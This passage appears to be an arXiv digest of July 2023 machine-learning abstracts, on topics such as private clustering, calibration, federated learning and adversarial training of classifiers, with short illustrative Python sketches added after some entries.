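        cores[i + 1] = np.einsum('ij,jkl->ikl', np.diag(S) @ Vt, cores[i + 1])
    return cores
```

Because the gauge transformation is absorbed downstream, the full contracted tensor is exactly preserved while the per-core parameterization becomes regular.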
    Differentially Private Clustering in Data Streams. (arXiv:2307.07449v1 [cs.DS])
    The streaming model is an abstraction of computing over massive data streams, which is a popular way of dealing with large-scale modern data analysis. In this model, there is a stream of data points, one after the other. A streaming algorithm is only allowed one pass over the data stream, and the goal is to perform some analysis during the stream while using as little space as possible. Clustering problems (such as $k$-means and $k$-median) are fundamental unsupervised machine learning primitives, and streaming clustering algorithms have been extensively studied in the past. However, since data privacy has become a central concern in many real-world applications, non-private clustering algorithms are not applicable in many scenarios. In this work, we provide the first differentially private streaming algorithms for $k$-means and $k$-median clustering of $d$-dimensional Euclidean data points over a stream with length at most $T$ using $poly(k,d,\log(T))$ space to achieve a {\it constant} multiplicative error and a $poly(k,d,\log(T))$ additive error. In particular, we present a differentially private streaming clustering framework which only requires an offline DP coreset algorithm as a blackbox. By plugging in existing DP coreset results via Ghazi, Kumar, Manurangsi 2020 and Kaplan, Stemmer 2018, we achieve (1) a $(1+\gamma)$-multiplicative approximation with $\tilde{O}_\gamma(poly(k,d,\log(T)))$ space for any $\gamma>0$, and the additive error is $poly(k,d,\log(T))$ or (2) an $O(1)$-multiplicative approximation with $\tilde{O}(k \cdot poly(d,\log(T)))$ space and $poly(k,d,\log(T))$ additive error. In addition, our algorithmic framework is also differentially private under the continual release setting, i.e., the union of outputs of our algorithms at every timestamp is always differentially private.  ( 3 min )
    PseudoCal: A Source-Free Approach to Unsupervised Uncertainty Calibration in Domain Adaptation. (arXiv:2307.07489v1 [cs.LG])
    Unsupervised domain adaptation (UDA) has witnessed remarkable advancements in improving the accuracy of models for unlabeled target domains. However, the calibration of predictive uncertainty in the target domain, a crucial aspect of the safe deployment of UDA models, has received limited attention. The conventional in-domain calibration method, \textit{temperature scaling} (TempScal), encounters challenges due to domain distribution shifts and the absence of labeled target domain data. Recent approaches have employed importance-weighting techniques to estimate the target-optimal temperature based on re-weighted labeled source data. Nonetheless, these methods require source data and suffer from unreliable density estimates under severe domain shifts, rendering them unsuitable for source-free UDA settings. To overcome these limitations, we propose PseudoCal, a source-free calibration method that exclusively relies on unlabeled target data. Unlike previous approaches that treat UDA calibration as a \textit{covariate shift} problem, we consider it as an unsupervised calibration problem specific to the target domain. Motivated by the factorization of the negative log-likelihood (NLL) objective in TempScal, we generate a labeled pseudo-target set that captures the structure of the real target. By doing so, we transform the unsupervised calibration problem into a supervised one, enabling us to effectively address it using widely-used in-domain methods like TempScal. Finally, we thoroughly evaluate the calibration performance of PseudoCal by conducting extensive experiments on 10 UDA methods, considering both traditional UDA settings and recent source-free UDA scenarios. The experimental results consistently demonstrate the superior performance of PseudoCal, exhibiting significantly reduced calibration error compared to existing calibration methods.
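The TempScal step that PseudoCal reuses on its pseudo-labeled target set can be sketched as follows (a minimal illustration; the grid search here stands in for the usual gradient-based fit, and the data are hypothetical):

```python
import numpy as np

def nll(logits, labels, T):
    """Mean negative log-likelihood of labels under a temperature-scaled softmax."""
    z = logits / T
    z = z - z.max(axis=1, keepdims=True)  # numerical stability
    log_probs = z - np.log(np.exp(z).sum(axis=1, keepdims=True))
    return -log_probs[np.arange(len(labels)), labels].mean()

def fit_temperature(logits, labels, grid=np.linspace(0.25, 5.0, 96)):
    """Pick the single temperature T minimizing NLL on a (pseudo-)labeled set."""
    return min(grid, key=lambda T: nll(logits, labels, T))
```

With a pseudo-labeled target set in place of held-out labeled data, this in-domain recipe applies unchanged, which is the transformation the abstract describes.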
    Deep reinforcement learning for the dynamic vehicle dispatching problem: An event-based approach. (arXiv:2307.07508v1 [cs.AI])
    The dynamic vehicle dispatching problem corresponds to deciding which vehicles to assign to requests that arise stochastically over time and space. It emerges in diverse areas, such as in the assignment of trucks to loads to be transported; in emergency systems; and in ride-hailing services. In this paper, we model the problem as a semi-Markov decision process, which allows us to treat time as continuous. In this setting, decision epochs coincide with discrete events whose time intervals are random. We argue that an event-based approach substantially reduces the combinatorial complexity of the decision space and overcomes other limitations of discrete-time models often proposed in the literature. In order to test our approach, we develop a new discrete-event simulator and use double deep Q-learning to train our decision agents. Numerical experiments are carried out in realistic scenarios using data from New York City. We compare the policies obtained through our approach with heuristic policies often used in practice. Results show that our policies exhibit better average waiting times, cancellation rates and total service times, with reductions in average waiting times of up to 50% relative to the other tested heuristic policies.  ( 2 min )
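The double deep Q-learning target used to train the agents can be sketched generically (an illustration, not the paper's agent; folding the random inter-event discount of the semi-Markov formulation into a per-transition gamma is an assumption made here for simplicity):

```python
import numpy as np

def double_dqn_targets(rewards, gammas, q_online_next, q_target_next):
    """Double DQN: the online net picks the argmax action, the target net evaluates it.

    `gammas` may vary per transition, reflecting the random inter-event
    times of an event-based (semi-Markov) formulation.
    """
    best_actions = q_online_next.argmax(axis=1)
    evals = q_target_next[np.arange(len(best_actions)), best_actions]
    return rewards + gammas * evals
```

Decoupling action selection from evaluation is what mitigates the overestimation bias of plain deep Q-learning.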
    Vulnerability-Aware Instance Reweighting For Adversarial Training. (arXiv:2307.07167v1 [cs.LG])
    Adversarial Training (AT) has been found to substantially improve the robustness of deep learning classifiers against adversarial attacks. AT involves obtaining robustness by including adversarial examples in training a classifier. Most variants of AT algorithms treat every training example equally. However, recent works have shown that better performance is achievable by treating them unequally. In addition, it has been observed that AT exerts an uneven influence on different classes in a training set and unfairly hurts examples corresponding to classes that are inherently harder to classify. Consequently, various reweighting schemes have been proposed that assign unequal weights to robust losses of individual examples in a training set. In this work, we propose a novel instance-wise reweighting scheme. It considers the vulnerability of each natural example and the resulting information loss on its adversarial counterpart occasioned by adversarial attacks. Through extensive experiments, we show that our proposed method significantly improves over existing reweighting schemes, especially against strong white and black-box attacks.  ( 2 min )
    Kernel t-distributed stochastic neighbor embedding. (arXiv:2307.07081v1 [cs.LG])
    This paper presents a kernelized version of the t-SNE algorithm, capable of mapping high-dimensional data to a low-dimensional space while preserving the pairwise distances between the data points in a non-Euclidean metric. This can be achieved using a kernel trick only in the high dimensional space or in both spaces, leading to an end-to-end kernelized version. The proposed kernelized version of the t-SNE algorithm can offer new views on the relationships between data points, which can improve performance and accuracy in particular applications, such as classification problems involving kernel methods. The differences between t-SNE and its kernelized version are illustrated for several datasets, showing a neater clustering of points belonging to different classes.  ( 2 min )
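The kernel trick in the high-dimensional space amounts to replacing Euclidean distances with feature-space distances computable from the Gram matrix alone, via d(x, y)^2 = k(x, x) - 2 k(x, y) + k(y, y). A minimal sketch (the resulting matrix could then be handed to any t-SNE implementation that accepts precomputed distances; the end-to-end variant, which also kernelizes the low-dimensional space, is not reproduced here):

```python
import numpy as np

def rbf_kernel(X, gamma=1.0):
    """Gram matrix of the RBF kernel k(x, y) = exp(-gamma * ||x - y||^2)."""
    sq = ((X[:, None, :] - X[None, :, :]) ** 2).sum(-1)
    return np.exp(-gamma * sq)

def kernel_induced_distances(K):
    """Feature-space distances from a Gram matrix:
    d(x, y)^2 = k(x,x) - 2 k(x,y) + k(y,y)."""
    diag = np.diag(K)
    sq = diag[:, None] - 2.0 * K + diag[None, :]
    return np.sqrt(np.maximum(sq, 0.0))  # clip tiny negatives from roundoff
```

Any positive-definite kernel can be substituted for the RBF here, which is what lets the embedding preserve a non-Euclidean metric.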
    $\Phi$-DVAE: Physics-Informed Dynamical Variational Autoencoders for Unstructured Data Assimilation. (arXiv:2209.15609v2 [stat.ML] UPDATED)
    Incorporating unstructured data into physical models is a challenging problem that is emerging in data assimilation. Traditional approaches focus on well-defined observation operators whose functional forms are typically assumed to be known. This prevents these methods from achieving a consistent model-data synthesis in configurations where the mapping from data-space to model-space is unknown. To address these shortcomings, in this paper we develop a physics-informed dynamical variational autoencoder ($\Phi$-DVAE) to embed diverse data streams into time-evolving physical systems described by differential equations. Our approach combines a standard, possibly nonlinear, filter for the latent state-space model and a VAE, to assimilate the unstructured data into the latent dynamical system. Unstructured data, in our example systems, comes in the form of video data and velocity field measurements; however, the methodology is suitably generic to allow for arbitrary unknown observation operators. A variational Bayesian framework is used for the joint estimation of the encoding, latent states, and unknown system parameters. To demonstrate the method, we provide case studies with the Lorenz-63 ordinary differential equation, and the advection and Korteweg-de Vries partial differential equations. Our results, with synthetic data, show that $\Phi$-DVAE provides a data efficient dynamics encoding methodology which is competitive with standard approaches. Unknown parameters are recovered with uncertainty quantification, and unseen data are accurately predicted.
    A Context-Aware Cutting Plane Selection Algorithm for Mixed-Integer Programming. (arXiv:2307.07322v1 [math.OC])
    The current cut selection algorithm used in mixed-integer programming solvers has remained largely unchanged since its creation. In this paper, we propose a set of new cut scoring measures, cut filtering techniques, and stopping criteria, extending the current state-of-the-art algorithm and obtaining a 4\% performance improvement for SCIP over the MIPLIB 2017 benchmark set.  ( 2 min )
    Benchmarks and Custom Package for Electrical Load Forecasting. (arXiv:2307.07191v1 [cs.LG])
    Load forecasting is of great significance in the power industry as it can provide a reference for subsequent tasks such as power grid dispatch, thus bringing huge economic benefits. However, there are many differences between load forecasting and traditional time series forecasting. On the one hand, load forecasting aims to minimize the cost of subsequent tasks such as power grid dispatch, rather than simply pursuing prediction accuracy. On the other hand, the load is largely influenced by many external factors, such as temperature or calendar variables. In addition, the scale of predictions (such as building-level loads and aggregated-level loads) can also significantly impact the predicted results. In this paper, we provide a comprehensive load forecasting archive, which includes load domain-specific feature engineering to help forecasting models better model load data. In addition, different from the traditional loss function which only aims for accuracy, we also provide a method to customize the loss function based on the forecasting error, integrating it into our forecasting framework. Based on this, we conducted extensive experiments on load data at different levels, providing a reference for researchers to compare different load forecasting models.  ( 2 min )
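A cost-aware loss of the kind described can be sketched as an asymmetric error penalty (an illustrative stand-in, not the paper's formulation; the 3:1 weighting reflects the assumption that under-forecasting, which risks expensive dispatch actions, is costlier than over-forecasting):

```python
import numpy as np

def asymmetric_load_loss(y_true, y_pred, under_weight=3.0, over_weight=1.0):
    """Penalize under-forecasts more heavily than over-forecasts."""
    err = y_true - y_pred  # positive err = under-forecast
    return np.where(err > 0, under_weight * err, -over_weight * err).mean()
```

Swapping such a loss in for plain MSE is one concrete way a forecasting objective can target downstream dispatch cost rather than raw accuracy.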
    Hybrid moderation in the newsroom: Recommending featured posts to content moderators. (arXiv:2307.07317v1 [cs.IR])
    Online news outlets are grappling with the moderation of user-generated content within their comment section. We present a recommender system based on ranking class probabilities to support and empower the moderator in choosing featured posts, a time-consuming task. By combining user and textual content features we obtain an optimal classification F1-score of 0.44 on the test set. Furthermore, we observe an optimum mean NDCG@5 of 0.87 on a large set of validation articles. As an expert evaluation, content moderators assessed the output of a random selection of articles by choosing comments to feature based on the recommendations, which resulted in an NDCG score of 0.83. We conclude that first, adding text features yields the best score and second, while choosing featured content remains somewhat subjective, content moderators found suitable comments in all but one of the evaluated recommendations. We end the paper by analyzing our best-performing model, a step towards transparency and explainability in hybrid content moderation.  ( 2 min )
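The NDCG@5 figures reported above can be computed with a few lines of standard code (the generic definition, not the authors' evaluation script):

```python
import math

def dcg_at_k(relevances, k):
    """Discounted cumulative gain of the top-k items in ranked order."""
    return sum(rel / math.log2(i + 2) for i, rel in enumerate(relevances[:k]))

def ndcg_at_k(relevances, k=5):
    """NDCG@k: DCG of the ranking divided by DCG of the ideal ordering."""
    ideal = dcg_at_k(sorted(relevances, reverse=True), k)
    return dcg_at_k(relevances, k) / ideal if ideal > 0 else 0.0
```

Here `relevances` lists the graded relevance of comments in the order the recommender ranked them; a perfect ranking scores 1.0.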
    DataAssist: A Machine Learning Approach to Data Cleaning and Preparation. (arXiv:2307.07119v1 [cs.LG])
    Current automated machine learning (ML) tools are model-centric, focusing on model selection and parameter optimization. However, the majority of the time in data analysis is devoted to data cleaning and wrangling, for which limited tools are available. Here we present DataAssist, an automated data preparation and cleaning platform that enhances dataset quality using ML-informed methods. We show that DataAssist provides a pipeline for exploratory data analysis and data cleaning, including generating visualization for user-selected variables, unifying data annotation, suggesting anomaly removal, and preprocessing data. The exported dataset can be readily integrated with other autoML tools or user-specified models for downstream analysis. Our data-centric tool is applicable to a variety of fields, including economics, business, and forecasting applications, saving over 50\% of the time spent on data cleansing and preparation.  ( 2 min )
    Controlling dynamical systems to complex target states using machine learning: next-generation vs. classical reservoir computing. (arXiv:2307.07195v1 [cs.LG])
    Controlling nonlinear dynamical systems using machine learning makes it possible not only to drive systems into simple behavior like periodicity but also into more complex, arbitrary dynamics. For this, it is crucial that a machine learning system can be trained to reproduce the target dynamics sufficiently well. Using the example of forcing a chaotic parametrization of the Lorenz system into intermittent dynamics, we show first that classical reservoir computing excels at this task. In a next step, we compare those results based on different amounts of training data to an alternative setup, where next-generation reservoir computing is used instead. It turns out that while delivering comparable performance for usual amounts of training data, next-generation RC significantly outperforms the classical approach in situations where only very limited data is available. This opens up further practical control applications in real-world problems where data is restricted.  ( 2 min )
    A testing-based approach to assess the clusterability of categorical data. (arXiv:2307.07346v1 [cs.LG])
    The objective of clusterability evaluation is to check whether a clustering structure exists within the data set. As a crucial yet often-overlooked issue in cluster analysis, it is essential to conduct such a test before applying any clustering algorithm. If a data set is unclusterable, any subsequent clustering analysis would not yield valid results. Despite its importance, the majority of existing studies focus on numerical data, leaving the clusterability evaluation issue for categorical data as an open problem. Here we present TestCat, a testing-based approach to assess the clusterability of categorical data in terms of an analytical $p$-value. The key idea underlying TestCat is that clusterable categorical data possess many strongly correlated attribute pairs and hence the sum of chi-squared statistics of all attribute pairs is employed as the test statistic for $p$-value calculation. We apply our method to a set of benchmark categorical data sets, showing that TestCat outperforms those solutions based on existing clusterability evaluation methods for numeric data. To the best of our knowledge, our work provides the first way to effectively recognize the clusterability of categorical data in a statistically sound manner.  ( 2 min )
    Generative adversarial networks for data-scarce spectral applications. (arXiv:2307.07454v1 [physics.optics])
    Generative adversarial networks (GANs) are one of the most robust and versatile techniques in the field of generative artificial intelligence. In this work, we report on an application of GANs in the domain of synthetic spectral data generation, offering a solution to the scarcity of data found in various scientific contexts. We demonstrate the proposed approach by applying it to an illustrative problem within the realm of near-field radiative heat transfer involving a multilayered hyperbolic metamaterial. We find that a successful generation of spectral data requires two modifications to conventional GANs: (i) the introduction of Wasserstein GANs (WGANs) to avoid mode collapse, and (ii) the conditioning of WGANs (CWGANs) to obtain accurate labels for the generated data. We show that a simple feed-forward neural network (FFNN), when augmented with data generated by a CWGAN, significantly enhances its performance under conditions of limited data availability, demonstrating the intrinsic value of CWGAN data augmentation beyond simply providing larger datasets. In addition, we show that CWGANs can act as a surrogate model with improved performance in the low-data regime with respect to simple FFNNs. Overall, this work highlights the potential of generative machine learning algorithms in scientific applications beyond image generation and optimization.  ( 2 min )
    Wasserstein Quantum Monte Carlo: A Novel Approach for Solving the Quantum Many-Body Schr\"odinger Equation. (arXiv:2307.07050v1 [physics.comp-ph])
    Solving the quantum many-body Schr\"odinger equation is a fundamental and challenging problem in the fields of quantum physics, quantum chemistry, and material sciences. One of the common computational approaches to this problem is Quantum Variational Monte Carlo (QVMC), in which ground-state solutions are obtained by minimizing the energy of the system within a restricted family of parameterized wave functions. Deep learning methods partially address the limitations of traditional QVMC by representing a rich family of wave functions in terms of neural networks. However, the optimization objective in QVMC remains notoriously hard to minimize and requires second-order optimization methods such as natural gradient. In this paper, we first reformulate energy functional minimization in the space of Born distributions corresponding to particle-permutation (anti-)symmetric wave functions, rather than the space of wave functions. We then interpret QVMC as the Fisher--Rao gradient flow in this distributional space, followed by a projection step onto the variational manifold. This perspective provides us with a principled framework to derive new QMC algorithms, by endowing the distributional space with better metrics, and following the projected gradient flow induced by those metrics. More specifically, we propose "Wasserstein Quantum Monte Carlo" (WQMC), which uses the gradient flow induced by the Wasserstein metric, rather than Fisher--Rao metric, and corresponds to transporting the probability mass, rather than teleporting it. We demonstrate empirically that the dynamics of WQMC results in faster convergence to the ground state of molecular systems.  ( 3 min )
    Enhancing ECG Analysis of Implantable Cardiac Monitor Data: An Efficient Pipeline for Multi-Label Classification. (arXiv:2307.07423v1 [eess.SP])
    Implantable Cardiac Monitor (ICM) devices represent, as of today, the fastest-growing market for implantable cardiac devices. As such, they are becoming increasingly common in patients for measuring heart electrical activity. ICMs constantly monitor and record a patient's heart rhythm and, when triggered, send it to a secure server where health care professionals (denoted HCPs from here on) can review it. These devices employ a relatively simplistic rule-based algorithm (due to energy consumption constraints) to alert for abnormal heart rhythms. This algorithm is usually parameterized to an over-sensitive mode in order to not miss a case (resulting in a relatively high false-positive rate), and this, combined with the device's nature of constantly monitoring the heart rhythm and its growing popularity, results in HCPs having to analyze and diagnose an increasingly growing amount of data. In order to reduce the load on the latter, automated methods for ECG analysis are nowadays becoming a great tool to assist HCPs in their analysis. While state-of-the-art algorithms are data-driven rather than rule-based, training data for ICMs often consist of specific characteristics which make its analysis unique and particularly challenging. This study presents the challenges and solutions in automatically analyzing ICM data and introduces a method for its classification that outperforms existing methods on such data. As such, it could be used in numerous ways such as aiding HCPs in the analysis of ECGs originating from ICMs by e.g. suggesting a rhythm type.  ( 3 min )
    Representation Learning With Hidden Unit Clustering For Low Resource Speech Applications. (arXiv:2307.07325v1 [eess.AS])
    The representation learning of speech, without textual resources, is an area of significant interest for many low resource speech applications. In this paper, we describe an approach to self-supervised representation learning from raw audio using a hidden unit clustering (HUC) framework. The input to the model consists of audio samples that are windowed and processed with 1-D convolutional layers. The learned "time-frequency" representations from the convolutional neural network (CNN) module are further processed with long short-term memory (LSTM) layers which generate a contextual vector representation for every windowed segment. The HUC framework, allowing the categorization of the representations into a small number of phoneme-like units, is used to train the model for learning semantically rich speech representations. The targets consist of phoneme-like pseudo labels for each audio segment and these are generated with an iterative k-means algorithm. We explore techniques that improve the speaker invariance of the learned representations and illustrate the effectiveness of the proposed approach on two settings, i) completely unsupervised speech applications on the sub-tasks described as part of the ZeroSpeech 2021 challenge and ii) semi-supervised automatic speech recognition (ASR) applications on the TIMIT dataset and on the GramVaani challenge Hindi dataset. In these experiments, we achieve state-of-the-art results for various ZeroSpeech tasks. Further, on the ASR experiments, the HUC representations are shown to improve significantly over other established benchmarks based on Wav2vec, HuBERT and Best-RQ.  ( 3 min )
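The iterative k-means pseudo-labeling step can be sketched generically over embedding vectors (an illustration of the target-generation idea, not the paper's pipeline; phoneme-like units correspond to cluster ids):

```python
import numpy as np

def kmeans_pseudo_labels(X, k, n_iter=50, rng=0):
    """Iterative k-means: returns a pseudo-label (cluster id) per frame."""
    rng = np.random.default_rng(rng)
    centers = X[rng.choice(len(X), size=k, replace=False)].astype(float)
    for _ in range(n_iter):
        # Assign each frame embedding to its nearest center...
        dists = ((X[:, None, :] - centers[None, :, :]) ** 2).sum(-1)
        labels = dists.argmin(axis=1)
        # ...then move each center to the mean of its assigned frames.
        for j in range(k):
            if (labels == j).any():
                centers[j] = X[labels == j].mean(axis=0)
    return labels
```

The resulting cluster ids serve as classification targets for the CNN-LSTM encoder, replacing the textual labels that low-resource settings lack.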
    Multi-Dimensional Ability Diagnosis for Machine Learning Algorithms. (arXiv:2307.07134v1 [cs.LG])
    Machine learning algorithms have become ubiquitous in a number of applications (e.g. image classification). However, because traditional metrics (e.g. the coarse-grained accuracy of each classifier) measure performance insufficiently, substantial gaps are usually observed between the real-world performance of these algorithms and their scores in standardized evaluations. In this paper, inspired by psychometric theories from human measurement, we propose a task-agnostic evaluation framework Camilla, where a multi-dimensional diagnostic metric Ability is defined for collaboratively measuring the multifaceted strength of each machine learning algorithm. Specifically, given the response logs from different algorithms to data samples, we leverage cognitive diagnosis assumptions and neural networks to learn the complex interactions among algorithms, samples and the skills (explicitly or implicitly pre-defined) of each sample. In this way, both the abilities of each algorithm on multiple skills and some of the sample factors (e.g. sample difficulty) can be quantified simultaneously. We conduct extensive experiments with hundreds of machine learning algorithms on four public datasets, and our experimental results demonstrate that Camilla not only captures the pros and cons of each algorithm more precisely, but also outperforms state-of-the-art baselines in metric reliability, rank consistency and rank stability.  ( 2 min )
    Making the Most Out of the Limited Context Length: Predictive Power Varies with Clinical Note Type and Note Section. (arXiv:2307.07051v1 [cs.CL])
    Recent advances in large language models have led to renewed interest in natural language processing in healthcare using the free text of clinical notes. One distinguishing characteristic of clinical notes is their long time span over multiple long documents. The unique structure of clinical notes creates a new design choice: when the context length for a language model predictor is limited, which part of clinical notes should we choose as the input? Existing studies either choose the inputs with domain knowledge or simply truncate them. We propose a framework to analyze the sections with high predictive power. Using MIMIC-III, we show that: 1) predictive power distribution is different between nursing notes and discharge notes and 2) combining different types of notes could improve performance when the context length is large. Our findings suggest that a carefully selected sampling function could enable more efficient information extraction from clinical notes.  ( 2 min )
    FedBIAD: Communication-Efficient and Accuracy-Guaranteed Federated Learning with Bayesian Inference-Based Adaptive Dropout. (arXiv:2307.07172v1 [cs.DC])
    Federated Learning (FL) emerges as a distributed machine learning paradigm without end-user data transmission, effectively avoiding privacy leakage. Participating devices in FL are usually bandwidth-constrained, and the uplink is much slower than the downlink in wireless networks, which causes a severe uplink communication bottleneck. A prominent direction for alleviating this problem is federated dropout, which drops fractional weights of local models. However, existing federated dropout studies focus on random or ordered dropout and lack theoretical support, resulting in unguaranteed performance. In this paper, we propose Federated learning with Bayesian Inference-based Adaptive Dropout (FedBIAD), which regards weight rows of local models as probability distributions and adaptively drops partial weight rows based on importance indicators correlated with the trend of local training loss. By applying FedBIAD, each client adaptively selects a high-quality dropping pattern with accurate approximations and only transmits parameters of non-dropped weight rows to mitigate uplink costs while improving accuracy. Theoretical analysis demonstrates that the convergence rate of the average generalization error of FedBIAD is minimax optimal up to a squared logarithmic factor. Extensive experiments on image classification and next-word prediction show that, compared with status quo approaches, FedBIAD provides a 2x uplink reduction with an accuracy increase of up to 2.41% even on non-Independent and Identically Distributed (non-IID) data, which brings up to a 72% decrease in training time.  ( 3 min )
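The row-wise dropout idea can be sketched as follows (a toy illustration only: the `importance` scores stand in for FedBIAD's Bayesian, loss-trend-based indicators, and all names are ours, not the paper's):

```python
import numpy as np

def select_rows_to_transmit(weight, importance, keep_ratio=0.5):
    """Keep the most important weight rows; drop the rest before upload.

    `importance` is assumed to be a per-row score supplied by the caller;
    in FedBIAD it would be derived from the local training-loss trend.
    """
    n_keep = max(1, int(round(keep_ratio * weight.shape[0])))
    kept = np.argsort(importance)[::-1][:n_keep]         # highest scores first
    payload = {int(i): weight[i] for i in sorted(kept)}  # rows actually sent
    return payload

W = np.arange(12, dtype=float).reshape(4, 3)   # 4 weight rows, 3 columns
scores = np.array([0.1, 0.9, 0.3, 0.7])        # toy per-row importance
sent = select_rows_to_transmit(W, scores, keep_ratio=0.5)
assert sorted(sent) == [1, 3]                  # only the top-2 rows are uploaded
```

With `keep_ratio=0.5`, half the rows never leave the device, which is the source of the uplink savings the abstract reports.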
    Do not Mask Randomly: Effective Domain-adaptive Pre-training by Masking In-domain Keywords. (arXiv:2307.07160v1 [cs.CL])
    We propose a novel task-agnostic in-domain pre-training method that sits between generic pre-training and fine-tuning. Our approach selectively masks in-domain keywords, i.e., words that provide a compact representation of the target domain. We identify such keywords using KeyBERT (Grootendorst, 2020). We evaluate our approach using six different settings: three datasets combined with two distinct pre-trained language models (PLMs). Our results reveal that the fine-tuned PLMs adapted using our in-domain pre-training strategy outperform PLMs that used in-domain pre-training with random masking as well as those that followed the common pre-train-then-fine-tune paradigm. Further, the overhead of identifying in-domain keywords is reasonable, e.g., 7-15% of the pre-training time (for two epochs) for BERT Large (Devlin et al., 2019).  ( 2 min )
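The masking step can be sketched minimally (a hand-supplied keyword list replaces the KeyBERT extraction step here; the function name and example sentence are ours):

```python
import re

def mask_keywords(text, keywords, mask_token="[MASK]"):
    """Mask occurrences of in-domain keywords instead of random tokens.

    In the paper the keyword list comes from a keyword extractor (KeyBERT);
    here it is supplied by hand purely for illustration.
    """
    for kw in keywords:
        # Whole-word, case-insensitive replacement of each keyword.
        text = re.sub(rf"\b{re.escape(kw)}\b", mask_token, text,
                      flags=re.IGNORECASE)
    return text

sent = "The patient showed elevated troponin after myocardial infarction."
out = mask_keywords(sent, ["troponin", "myocardial infarction"])
assert out == "The patient showed elevated [MASK] after [MASK]."
```

The masked positions then become the prediction targets during continued pre-training, concentrating the masked-language-modeling signal on domain-bearing words.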
    Safe DreamerV3: Safe Reinforcement Learning with World Models. (arXiv:2307.07176v1 [cs.LG])
    The widespread application of Reinforcement Learning (RL) in real-world situations is yet to come to fruition, largely as a result of its failure to satisfy the essential safety demands of such systems. Existing safe reinforcement learning (SafeRL) methods, employing cost functions to enhance safety, fail to achieve zero-cost in complex scenarios, including vision-only tasks, even with comprehensive data sampling and training. To address this, we introduce Safe DreamerV3, a novel algorithm that integrates both Lagrangian-based and planning-based methods within a world model. Our methodology represents a significant advancement in SafeRL as the first algorithm to achieve nearly zero-cost in both low-dimensional and vision-only tasks within the Safety-Gymnasium benchmark. Our project website can be found at: https://sites.google.com/view/safedreamerv3.
    Can Large Language Models Empower Molecular Property Prediction?. (arXiv:2307.07443v1 [cs.LG])
    Molecular property prediction has gained significant attention due to its transformative potential in multiple scientific disciplines. Conventionally, a molecule can be represented either as graph-structured data or as a SMILES text. Recently, the rapid development of Large Language Models (LLMs) has revolutionized the field of NLP. Although it is natural to utilize LLMs to assist in understanding molecules represented by SMILES, the exploration of how LLMs will impact molecular property prediction is still in its early stage. In this work, we advance towards this objective from two perspectives: zero/few-shot molecular classification, and using the new explanations generated by LLMs as representations of molecules. To be specific, we first prompt LLMs to perform in-context molecular classification and evaluate their performance. After that, we employ LLMs to generate semantically enriched explanations for the original SMILES and then leverage these to fine-tune a small-scale LM for multiple downstream tasks. The experimental results highlight the superiority of text explanations as molecular representations across multiple benchmark datasets, and confirm the immense potential of LLMs in molecular property prediction tasks. Codes are available at \url{https://github.com/ChnQ/LLM4Mol}.
    A decision framework for selecting information-transfer strategies in population-based SHM. (arXiv:2307.06978v1 [cs.LG])
    Decision-support for the operation and maintenance of structures provides significant motivation for the development and implementation of structural health monitoring (SHM) systems. Unfortunately, the limited availability of labelled training data hinders the development of the statistical models on which these decision-support systems rely. Population-based SHM seeks to mitigate the impact of data scarcity by using transfer learning techniques to share information between individual structures within a population. The current paper proposes a decision framework for selecting transfer strategies based upon a novel concept -- the expected value of information transfer -- such that negative transfer is avoided. By avoiding negative transfer, and by optimising information transfer strategies using the transfer-decision framework, one can reduce the costs associated with operating and maintaining structures, and improve safety.
    Variance-reduced accelerated methods for decentralized stochastic double-regularized nonconvex strongly-concave minimax problems. (arXiv:2307.07113v1 [math.OC])
    In this paper, we consider the decentralized, stochastic nonconvex strongly-concave (NCSC) minimax problem with nonsmooth regularization terms on both primal and dual variables, wherein a network of $m$ computing agents collaborate via peer-to-peer communications. We consider when the coupling function is in expectation or finite-sum form and the double regularizers are convex functions, applied separately to the primal and dual variables. Our algorithmic framework introduces a Lagrangian multiplier to eliminate the consensus constraint on the dual variable. Coupling this with variance-reduction (VR) techniques, our proposed method, entitled VRLM, by a single neighbor communication per iteration, is able to achieve an $\mathcal{O}(\kappa^3\varepsilon^{-3})$ sample complexity under the general stochastic setting, with either a big-batch or small-batch VR option, where $\kappa$ is the condition number of the problem and $\varepsilon$ is the desired solution accuracy. With a big-batch VR, we can additionally achieve $\mathcal{O}(\kappa^2\varepsilon^{-2})$ communication complexity. Under the special finite-sum setting, our method with a big-batch VR can achieve an $\mathcal{O}(n + \sqrt{n} \kappa^2\varepsilon^{-2})$ sample complexity and $\mathcal{O}(\kappa^2\varepsilon^{-2})$ communication complexity, where $n$ is the number of components in the finite sum. All complexity results match the best-known results achieved by a few existing methods for solving special cases of the problem we consider. To the best of our knowledge, this is the first work which provides convergence guarantees for NCSC minimax problems with general convex nonsmooth regularizers applied to both the primal and dual variables in the decentralized stochastic setting. Numerical experiments are conducted on two machine learning problems. Our code is downloadable from https://github.com/RPI-OPT/VRLM.
    Is Task-Agnostic Explainable AI a Myth?. (arXiv:2307.06963v1 [cs.AI])
    Our work serves as a framework for unifying the challenges of contemporary explainable AI (XAI). We demonstrate that while XAI methods provide supplementary and potentially useful output for machine learning models, researchers and decision-makers should be mindful of their conceptual and technical limitations, which frequently result in these methods themselves becoming black boxes. We examine three XAI research avenues spanning image, textual, and graph data, covering saliency, attention, and graph-type explainers. Despite the varying contexts and timeframes of the mentioned cases, the same persistent roadblocks emerge, highlighting the need for a conceptual breakthrough in the field to address the challenge of compatibility between XAI methods and application tasks.
    Frequency Domain Adversarial Training for Robust Volumetric Medical Segmentation. (arXiv:2307.07269v1 [eess.IV])
    It is imperative to ensure the robustness of deep learning models in critical applications such as, healthcare. While recent advances in deep learning have improved the performance of volumetric medical image segmentation models, these models cannot be deployed for real-world applications immediately due to their vulnerability to adversarial attacks. We present a 3D frequency domain adversarial attack for volumetric medical image segmentation models and demonstrate its advantages over conventional input or voxel domain attacks. Using our proposed attack, we introduce a novel frequency domain adversarial training approach for optimizing a robust model against voxel and frequency domain attacks. Moreover, we propose frequency consistency loss to regulate our frequency domain adversarial training that achieves a better tradeoff between model's performance on clean and adversarial samples. Code is publicly available at https://github.com/asif-hanif/vafa.
    Solving higher-order Lane-Emden-Fowler type equations using physics-informed neural networks: benchmark tests comparing soft and hard constraints. (arXiv:2307.07302v1 [physics.comp-ph])
